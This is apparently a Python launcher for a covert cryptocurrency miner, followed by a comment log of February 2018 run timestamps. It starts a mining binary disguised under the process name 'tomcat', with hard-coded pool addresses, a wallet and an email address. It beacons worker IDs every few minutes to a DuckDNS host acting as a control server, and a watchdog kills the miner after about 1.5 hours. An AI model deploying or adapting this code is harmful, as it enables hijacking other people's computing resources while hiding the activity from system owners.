import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:18:01.758443
#2018-02-17 16:05:05.578114
#2018-02-17 17:53:01.997003
#2018-02-17 19:39:03.823131
#2018-02-17 21:28:05.463776
#2018-02-17 23:13:01.362145
#2018-02-18 01:00:05.877965
#2018-02-18 02:48:05.412185
#2018-02-18 04:37:07.089711
#2018-02-18 06:28:04.110531
#2018-02-18 08:17:02.183795
#2018-02-18 10:04:07.759937
#2018-02-18 11:50:09.020259
#2018-02-18 13:35:07.407806
#2018-02-18 15:25:05.531672
#2018-02-18 17:14:04.082839
#2018-02-18 19:02:05.218449
#2018-02-18 20:49:01.608112
#2018-02-18 22:34:05.391391
#2018-02-19 00:22:05.639781
#2018-02-19 02:07:06.601879
#2018-02-19 03:55:06.461194
#2018-02-19 05:41:06.605487
#2018-02-19 07:30:05.464028
#2018-02-19 09:20:06.204138
#2018-02-19 11:10:01.746530
#2018-02-19 12:57:01.906131
#2018-02-19 14:44:10.592733
#2018-02-19 16:34:09.453776
#2018-02-19 18:21:08.021695
#2018-02-19 20:07:05.352164
#2018-02-19 21:58:01.922268
#2018-02-19 23:43:01.579200
#2018-02-20 01:32:06.548688
#2018-02-20 03:20:04.370816
#2018-02-20 05:06:06.515243
#2018-02-20 06:49:03.737947
#2018-02-20 08:36:04.133112
#2018-02-20 10:20:10.220712
#2018-02-20 12:05:08.664681
#2018-02-20 13:52:01.549920
#2018-02-20 15:32:01.454394
#2018-02-20 17:17:09.172652
#2018-02-20 19:06:04.853734
#2018-02-20 20:54:08.681922
#2018-02-20 22:38:06.217020
#2018-02-21 00:21:05.699585
#2018-02-21 02:06:05.662941
#2018-02-21 03:53:08.242144
#2018-02-21 05:41:05.950918
#2018-02-21 07:29:05.255175
#2018-02-21 09:14:06.832607
#2018-02-21 11:04:04.802910
#2018-02-21 12:50:03.309733
#2018-02-21 14:38:09.287143
#2018-02-21 16:25:02.116811
#2018-02-21 18:17:11.046565
#2018-02-21 20:04:09.733719
#2018-02-21 21:53:06.775988
#2018-02-21 23:39:05.800699
#2018-02-22 01:28:04.562691
#2018-02-22 03:16:06.748931
#2018-02-22 05:03:01.244744
#2018-02-22 06:46:01.452907
#2018-02-22 08:36:05.395266
#2018-02-22 10:23:04.229560
#2018-02-22 12:08:07.733199
#2018-02-22 13:54:01.803076
#2018-02-22 15:43:04.671450
#2018-02-22 17:32:10.265164
#2018-02-22 19:20:05.333981
#2018-02-22 21:13:06.052887
#2018-02-22 22:58:08.725475
#2018-02-23 00:47:04.507872
#2018-02-23 02:37:06.678416
#2018-02-23 04:26:05.806503
#2018-02-23 06:12:06.426792
#2018-02-23 07:58:03.478981
#2018-02-23 10:16:06.900492
#2018-02-23 12:09:07.329190
#2018-02-23 13:57:05.824440
#2018-02-23 15:49:07.055096
#2018-02-23 17:36:08.024096
#2018-02-23 19:24:07.011156
#2018-02-23 21:09:04.615325
#2018-02-23 22:55:07.175844
#2018-02-24 00:41:07.415199
#2018-02-24 02:32:01.343042
#2018-02-24 04:27:04.299526
#2018-02-24 06:12:06.853217
#2018-02-24 07:59:07.599284
#2018-02-24 09:44:06.335320
#2018-02-24 11:41:05.122206
#2018-02-24 13:32:06.484917
#2018-02-24 15:19:01.598661
#2018-02-24 17:09:04.927846
#2018-02-24 19:00:09.678587
#2018-02-24 20:47:08.119264
#2018-02-24 23:04:03.791983
#2018-02-25 02:20:08.185719
#2018-02-25 05:36:04.974784
#2018-02-25 11:35:01.667635